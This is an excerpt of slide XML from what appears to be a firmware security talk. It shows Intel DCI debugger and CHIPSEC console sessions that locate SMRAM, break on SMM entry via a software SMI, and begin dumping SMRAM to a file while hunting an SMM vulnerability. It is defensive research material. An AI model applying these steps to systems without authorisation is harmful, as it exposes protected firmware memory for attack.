              <a:t>DCI: Transport has been detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Target Configuration: SKL_SPT_OpenDCI_Dbc_Only_ReferenceSettings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Note: Target reset has occurred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Note: Power Restore occurred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Note: The ‘coregroupsactive’ control variable has been set to ‘GPC’</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Using SKL_SPT_OpenDCI_Dbc_Only_ReferenceSettings</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Successfully imported “C:\Intel\DAL\dalstartup”</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;? itp.halt()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T1] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T0] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T1] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Shape 463"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Setting up Intel DFx Abstraction Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Shape 464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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469" name="Shape 469"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Shape 470"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605160" y="3079080"/>
            <a:ext cx="11501640" cy="718200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="90000" rIns="90000" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-2300" lvl="0" marL="396000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Hunting the SMM vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Shape 471"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="2912760"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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476" name="Shape 476"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Shape 477"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651039" y="1559880"/>
            <a:ext cx="9682200" cy="428868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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Firstly, use CHIPSEC  to know where the SMRAM is located</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>In [5]: import chipsec.chipset</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>In [6]: cs = chipsec.chipset.cs()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>...: cs.init(None, True, True)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>...:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="EFEFE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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>WARNING: *******************************************************************</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>WARNING: Chipsec should only be used on test systems!</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>WARNING: It should not be installed/deployed on production end-user systems.</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>WARNING: See WARNING.txt</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>WARNING: *******************************************************************</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="EFEFE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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[CHIPSEC] API mode: using CHIPSEC kernel module API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>In [7]: SMRAM = cs.cpu.get_SMRAM()</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>In [8]: hex(SMRAM[0])</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Out[8]: ‘0xbd000000L’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>In [9]: hex(SMRAM[1])</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Out[9]: ‘0xbd7fffffL’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Shape 478"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 1. Dumping SMRAM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Shape 479"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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484" name="Shape 484"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Shape 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641986" y="1559880"/>
            <a:ext cx="9682200" cy="377028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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>To access the SMRAM, set the breakpoint on SMM entering, and gener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>ate SW SMI (by writing to IO port 0xB2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;? itp.halt()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T1] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T0] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T1] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.cv.smmentrybreak=1</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.threads[0].port(0xb2, 0)</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.go()</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] SMM Entry break at 0xC600:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T1] SMM Entry break at 0xC680:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T0] SMM Entry break at 0xC700:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T1] SMM Entry break at 0xC780:0000000000008000 in task 0x0040</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Shape 486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 1. Dumping SMRAM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Shape 487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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492" name="Shape 492"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Shape 493"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641986" y="1559880"/>
            <a:ext cx="9682200" cy="161172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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Finally, read the SMRAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.threads[0].memsave(‘smram.bin’, ‘0xbd000000P’, ‘0xbd7fffffP’, True)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Due to the requested amount of memory (8388608 bytes), this command will take a while to execute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
